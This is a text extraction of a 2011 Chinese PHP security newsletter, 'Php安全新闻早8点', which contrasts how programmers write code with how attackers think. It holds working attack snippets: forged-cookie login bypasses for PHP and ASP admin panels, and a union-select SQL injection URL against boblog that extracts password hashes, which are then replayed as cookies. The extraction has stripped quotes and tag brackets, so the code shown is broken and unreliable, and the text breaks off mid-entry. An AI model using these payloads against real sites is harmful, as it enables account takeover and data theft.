Php安全新闻早8点.pdfVIP

Php安全新聞早8點——週刊版 作者：Micropoor micropoor@163.com /micropoor //2011-11-09 星期三 //程序员的思维： echo This is The $Micropoor.s; //有效 echo This is The .$Micropoor.s; //有效 //我们的思维： $Micropoor = Bug; echo This is The $Micropoors;// 无效；字母s会被当成有效的变量名组成元素，但是这里的 变量是$Micropoor echo This is The ${Micropoor}s; // 有效 echo This is The {$Micropoor}s; // 有效 结论：二次利用才是最大的价值。 //2011-11-10 星期四 //程序员的思维： 1.?php echo pMicropoor./p; ? //有效 2.? echo pMicropoor./p; ? //有效 //我们的思维： 1.script language = php echo pMicropoor./p ; /script //有效 2.% echo p Micropoor./p ; % //有效 //注：asp风格需要配置设定asp_tags 启用。不过默认情况下是禁止的。 //% % 这个要 asp_tags = On 结论：以不变应万变 //2011-11-11 星期五 //php 程序员的思维： // login.php 代码片段 if($adminuser==$user and $adminpass==$pass) { setcookie(login,yes,time()+3600); header(location:admin.php); } //我们的思维： javascript:alert(document.cookie=login=+escape(yes)) ############################################################ //asp 程序员的思维： //代码片段 % if Request.Cookies(xxx)(user)= or Request.Cookies(xxx)(admin_pass)= or Request.Cookies(xxx)(admin_class)= then Response.Cookies(xxx)(user)= Response.Cookies(xxx)(pass)= Response.Cookies(xxx)(admin_class)= response.redirect ad_login.asp response.end end if % //代码片段--判断身份 %if rs(admin_class)=0 then response.write selected%admin %if rs(admin_class)=1 then response.writeselected%user %if rs(admin_class)=2 then response.writeselected%guest //我们的思维： admin_class=0 ############################################################# php实例拓展：这里我引用下 心灵牛的一个例子： //代码片段 if ($go) @list($job, $itemid)=@explode(_, basename($go)); //略 原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23 //略 假如某牛真的注入成功得到MD5密码不用去跑MD5了 直接 setcookie (userid, 1,); setcookie (userpsw, md5密文, ); 结论：往往快捷方便，注定踏上了死亡路。 //2011-11-12 星期六 // 程序员的思维： // index.p